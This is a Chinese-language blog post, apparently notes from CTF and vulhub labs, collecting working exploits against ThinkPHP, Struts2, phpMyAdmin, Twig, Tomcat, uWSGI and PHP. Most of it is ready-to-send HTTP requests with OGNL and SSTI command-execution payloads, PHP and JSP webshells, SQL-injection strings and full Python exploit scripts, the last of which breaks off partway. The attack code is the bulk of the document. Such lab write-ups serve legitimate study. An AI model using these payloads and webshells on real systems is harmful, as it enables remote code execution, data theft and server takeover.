部分框架exp

2021-03-04

字数统计: 12.3k字 | 阅读时长≈ 67分

用BUUCTF和vulhub的环境复现了一下，只以ls和env命令执行为例，buuctf中flag在环境变量里

[ThinkPHP]5.0.23-Rce

POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:25368
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://node3.buuoj.cn:25368
Connection: close
Referer: http://node3.buuoj.cn:25368/public/index.php?s=captcha
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d
Upgrade-Insecure-Requests: 1

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

[ThinkPHP]2-Rce

影响版本

thinkphp 2.x

漏洞利用

1	http://node3.buuoj.cn:28435/?s=/index/index/name/${@phpinfo()}

漏洞成因

因为在ThinkPHP ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：

1 2	$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

具体可以看这个：https://www.freebuf.com/column/223149.html

[struts2]s2-013

影响版本

Struts 2.0.0 - Struts 2.3.14.1

漏洞利用

http://node3.buuoj.cn:25127/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%2bnew%20java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D

一定要先进行URL编码

漏洞成因

Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性，其值可设置为 none，get 或 all，参考官方其对应意义如下：
none - 链接不包含请求的任意参数值（默认）
get - 链接只包含 GET 请求中的参数和其值
all - 链接包含 GET 和 POST 所有参数和其值
<s:a>用来显示一个超链接，当includeParams=all的时候，会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染，造成任意命令执行漏洞。

[PHPMYADMIN]CVE-2018-12613

影响版本

phpMyAdmin 4.8.0和4.8.1

漏洞利用

1	http://node3.buuoj.cn:28849/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

获取shell方式：

创建一个test库，shell表，写入<? @eval($_GET['a']);?>，然后包含/bin/mysql/data/test/shell.frm即可得到shell（windows需要用show variables like '%datadir%';查看本地目录，在%datadir%/test/shell.frm中）
select 一句话木马，如<?php @eval($_GET['a']);?>，再用F12查看自己的sessionID，再包含文件：http://node3.buuoj.cn:27081/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../../../tmp/sess_66046709714366d3ed1d5e5b24034e19即可getshell

 set global general_log = "ON";    -- 打开日志保存
 set global general_log_file = "G:/phpstudy/WWW/log.php";  -- 设置日志保存路径,需先得知网站物理路径,否则即使写入了Shell也无法通过URL连接
1
2
3
4
5

写shell

```mysql
 select '<?php eval($_POST[pwd]); ?>';

## [struts2]s2-045（CVE-2017-5638）

影响版本

Struts 2.3.5 - Struts 2.3.31，Struts 2.5 - Struts 2.5.10

漏洞利用

poc：

POST /doUpload.action HTTP/1.1
Host: node3.buuoj.cn:29941
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}boundary=---------------------------19915938271113359902680803046
Content-Length: 339
Origin: http://node3.buuoj.cn:29941
Connection: close
Referer: http://node3.buuoj.cn:29941/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; PHPSESSID=61d5fa7b90176af0db4b2b83ab3a0296; JSESSIONID=1xye3s548kdzgziqu6mnf3t4m; phpMyAdmin=66046709714366d3ed1d5e5b24034e19; pma_lang=zh_CN
Upgrade-Insecure-Requests: 1

-----------------------------19915938271113359902680803046
Content-Disposition: form-data; name="upload"; filename=""
Content-Type: application/octet-stream


-----------------------------19915938271113359902680803046
Content-Disposition: form-data; name="caption"

1
-----------------------------19915938271113359902680803046--

返回105059592则表示有漏洞

exp：

POST /doUpload.action HTTP/1.1
Host: node3.buuoj.cn:29941
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='env').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------19915938271113359902680803046
Content-Length: 339
Origin: http://node3.buuoj.cn:29941
Connection: close
Referer: http://node3.buuoj.cn:29941/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; PHPSESSID=61d5fa7b90176af0db4b2b83ab3a0296; JSESSIONID=1xye3s548kdzgziqu6mnf3t4m; phpMyAdmin=66046709714366d3ed1d5e5b24034e19; pma_lang=zh_CN
Upgrade-Insecure-Requests: 1

-----------------------------19915938271113359902680803046
Content-Disposition: form-data; name="upload"; filename=""
Content-Type: application/octet-stream


-----------------------------19915938271113359902680803046
Content-Disposition: form-data; name="caption"

1
-----------------------------19915938271113359902680803046--

[struts2]s2-001

影响版本

Struts 2.0.0 - Struts 2.0.8

漏洞利用

POST /login.action HTTP/1.1
Host: node3.buuoj.cn:27568
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 581
Origin: http://node3.buuoj.cn:27568
Connection: close
Referer: http://node3.buuoj.cn:27568/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; PHPSESSID=61d5fa7b90176af0db4b2b83ab3a0296; JSESSIONID=AC07766D0CEF131212F028D96F497D4C; phpMyAdmin=66046709714366d3ed1d5e5b24034e19
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22env%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C+%23b%3D%23a.getInputStream%28%29%2C+%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C+%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C+%23e%3Dnew+char%5B50000%5D%2C+%23d.read%28%23e%29%2C+%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C+%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C+%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29+%7D

获取web路径：

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

获取tomcat执行路径：

1	%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

[TWIG]SSTI

在BUUCTF里的[Flask]SSTI是php的twig框架的SSTI（cookie里有phpstudy，而且主页面也看得出）

但我没执行成功，也记一下吧

{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.enableDebug()}}{{_self.env.isDebug()}}

{{["id"]|map("system")|join(",")}}

{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}

{{["id",0]|sort("system")|join(",")}}

{{["id"]|filter("system")|join(",")}}

{{[0,0]|reduce("system","id")|join(",")}}

{{['cat /etc/passwd']|filter('system')}}

[Tomcat]CVE-2017-12615

影响版本

Apache Tomcat 7.0.0 – 7.0.79

漏洞利用

任意文件上传

PUT /shell.jsp/ HTTP/1.1
Host: node3.buuoj.cn:27672
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; PHPSESSID=61d5fa7b90176af0db4b2b83ab3a0296; JSESSIONID=AC07766D0CEF131212F028D96F497D4C; phpMyAdmin=66046709714366d3ed1d5e5b24034e19
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 658

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

1	http://node3.buuoj.cn:27672/shell.jsp?&pwd=023&cmd=env

[struts2]s2-007

影响版本

2.0.0 - 2.2.3

漏洞利用

POST /user.action HTTP/1.1
Host: node3.buuoj.cn:27164
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: http://node3.buuoj.cn:27164
Connection: close
Referer: http://node3.buuoj.cn:27164/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; PHPSESSID=61d5fa7b90176af0db4b2b83ab3a0296; JSESSIONID=3EDDE2ACE76D957CEECF6104634DDC4C; phpMyAdmin=66046709714366d3ed1d5e5b24034e19
Upgrade-Insecure-Requests: 1

name=1&email=1&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27env%27%29.getInputStream%28%29%29%29+%2B+%27

[struts2]s2-046

影响版本

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

漏洞利用

POST /doUpload.action HTTP/1.1
Host: node3.buuoj.cn:25082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------331710620016461278061755578567
Content-Length: 1272
Origin: http://node3.buuoj.cn:25082
Connection: close
Referer: http://node3.buuoj.cn:25082/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; JSESSIONID=1vypt3i2fldc818zxtqvqxg3k0
Upgrade-Insecure-Requests: 1

-----------------------------331710620016461278061755578567
Content-Disposition: form-data; name="upload"; filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"
Content-Type: application/octet-stream

#\
php_value zend.multibyte 1
#\
php_value zend.script_encoding "UTF-7"
AddType  application/x-httpd-php    .png
-----------------------------331710620016461278061755578567
Content-Disposition: form-data; name="caption"


-----------------------------331710620016461278061755578567--

上传内容随意，但在结尾的字母b前面必须加入00截断，否则不成功，如图：

[struts2]s2-008

影响版本

2.1.0 - 2.3.1

漏洞利用

S2-008 涉及多个漏洞，Cookie 拦截器错误配置可造成 OGNL 表达式执行，但是由于大多 Web 容器（如 Tomcat）对 Cookie 名称都有字符限制，一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模
式后会有多个调试接口能够直接查看对象信息或直接执行命令，而这种问题在生产环境是几乎见不到的，当然，不排除黑客故意开启以达到留后门的目的。

在BUU上提供了这两个模式，先说dev模式:

http://node3.buuoj.cn:27368/devmode.action?debug=command&expression=(%23_memberAccess.allowStaticMethodAccess=true,%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=false,%23cmd=%22env%22,%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[100],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))

这里可以修改res的值来获取更多的数据，如res=new+byte[1000]

http://node3.buuoj.cn:27368/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c%23foo%3dnew%20java.lang.Boolean(%22false%22)%20%2c%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d%23foo%2c%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()))

值得注意的是dev模式下的cve编号为CVE-2012-0391，而cookie拦截器模式的CVE编号是CVE-2012-0392，不过我没有找到可行的exp，放一个在exploit-db找到的EXP过来吧

1	Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1

[uwsgi]CVE-2018-7490

影响版本

uWSGI 2.0.17之前

漏洞利用

路径遍历：

1	http://node3.buuoj.cn:26763/..%2f..%2f..%2f..%2fetc/passwd

[PHPMYADMIN]CVE-2016-5734

受影响版本

phpMyAdmin 4.0.10.16之前4.0.x版本

4.4.15.7之前4.4.x版本

4.6.3之前4.6.x版本

Php版本： 4.3.0 ~5.4.6

Php 5.0 版本以上的将 preg_replace 的 /e修饰符给废弃掉了

漏洞利用

在kali里直接利用exp，一般来说是在下面这个目录里

1
2

cd /usr/share/exploitdb/exploits/php/webapps/40185.py
python3 40185.py -u root -p root http://node3.buuoj.cn:26586/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1Rbcm9vdF0pOz8+'));"

如果找不到可以进msfconsole，用searchsploit phpmyadmin查找文件名，然后用find / -name ""来找到文件位置

也可以直接在windows中直接利用：

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()
    url_to_pma = arguments.url
    uname = arguments.user
    upass = arguments.pwd
    if arguments.dbs:
        db = arguments.dbs
    else:
        db = "test"
    token = False
    custom_table = False
    if arguments.table:
        custom_table = True
        table = arguments.table
    else:
        table = "prgpwn"
    if arguments.cmd:
        payload = arguments.cmd
    else:
        payload = "system('uname -a');"

    size = 32
    s = requests.Session()
    # you can manually add proxy support it's very simple ;)
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    s.verify = False
    sql = '''CREATE TABLE `{0}` (
      `first` varchar(10) CHARACTER SET utf8 NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
    '''.format(table)

    # get_token
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    if resp.status_code is 200:
        token_place = resp.text.find("token=") + 6
        token = resp.text[token_place:token_place + 32]
    if token is False:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if custom_table is False:
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            if "success" in resp.json():
                if resp.json()["success"] is False:
                    first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
                    error = first[:first.find("</code>")]
                    if "already exists" in error:
                        print(error)
                    else:
                        print("ERROR: " + error)
                        sys.exit(1)
    # build exploit
    exploit = {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true"
    }
    resp = s.post(
        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
    )
    if resp.status_code == 200:
        result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
        if len(result):
            print("result: " + result)
            sys.exit(0)
        print(
            "Exploit failed!\n"
            "Try to manually set exploit parameters like --table, --database and --token.\n"
            "Remember that servers with PHP version greater than 5.4.6"
            " is not exploitable, because of warning about null byte in regexp"
        )
        sys.exit(1)

其中-u为用户名，-p为密码，-c为php语句

1	python3 40185.py -u root -p root http://node3.buuoj.cn:26586/ -c "system('env')"

[ThinkPHP]IN SQL INJECTION

这是一个thinkphp 5.09版本的显错注入

1	http://node3.buuoj.cn:25531/?ids[0,updatexml(1,concat(0x7,user(),0x7e),1)]=1

挺鸡肋的，因为之只能通过报错获取类似于database()、user()这类信息，而不支持子查询，具体可以看先知社区的一篇文章

[struts2]s2-005

影响版本:

2.0.0 - 2.1.8.1

漏洞利用

http://node3.buuoj.cn:27307/example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)((%27%5cu0023rt.exec(%22env%22.split(%22@%22))%27)(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

需要注意的是，这个漏洞没有回显，当他进行了302跳转时即为利用成功。

[struts2]s2-053

影响版本

Struts 2.0.1 - Struts 2.3.33、Struts 2.5 - Struts 2.5.10

漏洞利用

POST /hello.action HTTP/1.1
Host: node3.buuoj.cn:28693
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 824
Origin: http://node3.buuoj.cn:28693
Connection: close
Referer: http://node3.buuoj.cn:28693/hello.action
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; JSESSIONID=FC807C0D76697A4D045CEDBFB83D33CF; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D
Upgrade-Insecure-Requests: 1

redirectUri=%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b'com.opensymphony.xwork2.ActionContext.container'%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3d'env').(%23iswin%3d(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3d(%23iswin%3f%7b'cmd.exe'%2c'%2fc'%2c%23cmd%7d%3a%7b'%2fbin%2fbash'%2c'-c'%2c%23cmd%7d)).(%23p%3dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3d%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7d%0d%0a

[Jupyter]notebook-rce

漏洞成因

如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。

漏洞利用

[PHP]inclusion

影响版本

所有版本，但需要文件包含漏洞和一个可以访问的phpinfo页面

漏洞利用

直接利用exp

https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py

#coding:utf-8
#python2.x
import sys
import threading
import socket

"""-------------构造webshell请求包-------------------"""
def setup(host, port):
    #webshell内容,在/tmp/g下写入shell，payload可以根据实际情况进行修改
    TAG="Security Test"
    PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG

    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD

    padding="A" * 5000
    #构造http请求头，在这里调整phpinfo的位置
    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)


    #可以存在文件包含的路径
    #测试文件包含，具体路径可以根据实际情况进行修改
    LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""

    return (REQ1, TAG, LFIREQ)

def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s2.connect((host, port))
    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        #在这里找到真正的缓存文件的名字，一共14位
        i = d.index("[tmp_name] =&gt; ")
        fn = d[i+17:i+31]
        #print fn
    except ValueError:
        return None
    #尝试利用文件包含漏洞写入/tmp/g
    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()

    #测试是否存在Security Test标志
    if d.find(tag) != -1:
        return fn

counter=0

class ThreadWorker(threading.Thread):
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock =  l
        self.maxattempts = m
        self.args = args

    def run(self):
        global counter
        while not self.event.is_set():  #如果没有线程成功写入/tmp/g则循环尝试写入，醉倒尝试次数为maxattempts

            #因为要操作共享变量counter，所以需要先获得锁
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter+=1


            try:
                x = phpInfoLFI(*self.args) #实际的payload执行，先发送websshell上传数据包给phpinfo，然后再文件包含写入永久shell
                if self.event.is_set(): #判断是否有其他线程已经写入/tmp/g,如果存在循环终止，线程结束
                    break                
                if x: #如果存在标签
                    print "\nGot it! Shell created in /tmp/g"
                    self.event.set()   #此时已经写入/tmp/g，通过set()方法将event标志置为1，便于通知其他线程通过判断is_set()来结束线程运行
            except socket.error:
                return
    

def getOffset(host, port, phpinforeq): #得到缓存文件名在输出流中的位置，便于提取完整文件名
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(phpinforeq)

    d = ""
    while True:
        i = s.recv(4096)
        d+=i        
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =&gt; ")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
    print "found %s at %i" % (d[i:i+10],i)
    # padded up a bit
    return i+256

def main():
    print "LFI With PHPInfo()"
    print "-=" * 30
    if len(sys.argv) < 2:
        print "Usage: %s host [port] [threads]" % sys.argv[0]
        sys.exit(1)
    try:
        host = socket.gethostbyname(sys.argv[1]) #得到目标ip地址
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)
    port=80
    try:
        port = int(sys.argv[2])  #得到端口号
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)
    
    poolsz=10
    try:
